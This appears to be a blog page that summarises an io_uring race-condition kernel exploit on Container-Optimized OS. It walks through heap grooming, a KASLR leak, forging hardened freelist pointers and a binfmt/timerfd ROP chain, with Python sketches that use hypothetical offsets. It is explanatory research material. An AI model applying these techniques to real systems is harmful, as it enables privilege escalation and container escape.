People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
io_uring is a new subsystem in the Linux kernel used for speedy IO operations. Normally, a program may need to do privilege transitions many times via syscalls. With io_uring, a series of IO operations can instead be submitted together and performed in parallel.

When io_req_init_async is called, it assigns its own identity to be the worker of the IO request. However, if two threads submit an IO request to the same io_uring at the same time, then they will be attached to the same work queue but with different IDs. The fact that the same identity is used for two different requests is what causes the very subtle security issue.

With CONFIG_HARDENED_USERCOPY (which is enabled on the Container-Optimized OS), the function used to copy data from userland (copy_from_user) cannot be used across slot boundaries. So, the typical method of placing a msg_msg object and corrupting it will not work. It's possible to spray this area with objects we don't own, but it's not trivial.

timerfd_ctx is within the kmalloc-256 slot and has plenty of pointers, making it a prime target for exploitation within our fake slot. From the fake slot, the author decided to use the upper and lower slots with the msg_msgseg object, which has mostly user-controlled data.

timerfd_ctx contains a pointer back to itself (heap), leading to a nice leak from the msg_msgseg object. For breaking KASLR, arming the timer will set a function pointer which points to the .text section.

The CONFIG_SLAB_FREELIST_HARDENED flag is turned on, which is a type of pointer encoding that requires users to know the storage address of the pointer, a random value and the new pointer itself. By filling up the entire slab, we can force the ptr to be NULL, leak it and calculate the random value to write the pointer ourselves.

binfmt: the structures used for loading executables are writable!
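The freelist pointer trick described above is easier to follow with the arithmetic written out. The sketch below is a userland model only, and it assumes the encoding is `ptr ^ random ^ swab(ptr_addr)`, which is my understanding of `freelist_ptr()` in `mm/slub.c` on recent kernels (older kernels omit the byte swap). The function names and every address or secret value here are hypothetical and chosen purely for illustration.

```python
MASK64 = (1 << 64) - 1


def swab64(value: int) -> int:
    """Byte-swap a 64-bit value, modelling the kernel's swab() on an unsigned long."""
    return int.from_bytes((value & MASK64).to_bytes(8, "little"), "big")


def encode_freelist_ptr(ptr: int, ptr_addr: int, random: int) -> int:
    """Model of the hardened encoding (assumed form): ptr ^ random ^ swab(ptr_addr)."""
    return (ptr ^ random ^ swab64(ptr_addr)) & MASK64


def recover_random(leaked_encoded_null: int, ptr_addr: int) -> int:
    """If the stored pointer was NULL, the leak equals random ^ swab(ptr_addr),
    so XORing the swapped storage address back out yields the random value."""
    return (leaked_encoded_null ^ swab64(ptr_addr)) & MASK64


# Hypothetical values standing in for a real heap leak.
secret_random = 0x1122334455667788   # per-cache random value (unknown to the attacker)
slot_addr = 0xFFFF888012345600       # where the freelist pointer is stored (leaked heap address)
target = 0xFFFFFFFF82A00000          # address we want the allocator to hand out next

# Full slab: the next-free pointer is NULL, so the encoded value leaks the secret.
leaked = encode_freelist_ptr(0, slot_addr, secret_random)
recovered = recover_random(leaked, slot_addr)

# With the random value known, a valid encoded pointer can be forged.
forged = encode_freelist_ptr(target, slot_addr, recovered)
decoded = forged ^ recovered ^ swab64(slot_addr)
```

Because XOR is its own inverse, the same function encodes and decodes. That is why knowing the storage address plus one encoded NULL is enough to forge arbitrary freelist entries in this model.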
Using the primitive from above, the load_binary callback function can be abused to get PC control and start a ROP chain.

The container's filesystem was tmpfs, which was not compatible with the exploit, since the O_DIRECT file flag was needed to make it work. Only a few files could be opened with this flag in the container and they were all very small, making the exploit unreliable.

To work around this, timerfd_ctx was used to ROP instead. Using this, the same controlled binfmt overwrite could be used to get code execution. Another novel technique was calling msleep to gracefully end the ROP chain in the interrupt context so that the program does not crash.
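To make the KASLR and ROP steps concrete, here is a minimal sketch of how a leaked .text pointer becomes a kernel base, and how a chain ending in msleep could be laid out. This is not the author's exploit code. Every offset, the sleep duration and the helper names are hypothetical placeholders, and the 2 MiB base alignment check assumes a default x86_64 configuration.

```python
import struct

# Hypothetical offsets from the kernel base; real values depend on the exact kernel build.
OFFSETS = {
    "timer_callback": 0x3A1B40,  # function pointer set when the timer is armed
    "pop_rdi_ret": 0x0012F0,     # gadget: pop rdi; ret
    "msleep": 0x14C9A0,          # msleep(), used to park the hijacked context
}
SLEEP_MS = 0x7FFFFFFF            # hypothetical "sleep for a very long time" argument
KASLR_ALIGN = 0x200000           # assumed 2 MiB alignment of the kernel base


def kernel_base(leaked_fn: int, fn_offset: int) -> int:
    """Subtract the known offset of the leaked function to recover the base."""
    base = leaked_fn - fn_offset
    if base % KASLR_ALIGN != 0:
        raise ValueError("leak does not match the assumed offset or alignment")
    return base


def build_chain(base: int) -> bytes:
    """Lay out a tiny chain that calls msleep(SLEEP_MS) instead of returning."""
    words = [
        base + OFFSETS["pop_rdi_ret"],  # load the first argument register
        SLEEP_MS,                       # argument for msleep
        base + OFFSETS["msleep"],       # never return into corrupted state
    ]
    return b"".join(struct.pack("<Q", word) for word in words)


# Hypothetical leak read back through the msg_msgseg object.
leaked_pointer = 0xFFFFFFFF9E7A1B40
base = kernel_base(leaked_pointer, OFFSETS["timer_callback"])
chain = build_chain(base)
```

A real chain would do its privileged work before the final msleep call. The sketch only shows the rebasing arithmetic and the idea of ending the chain by sleeping rather than returning.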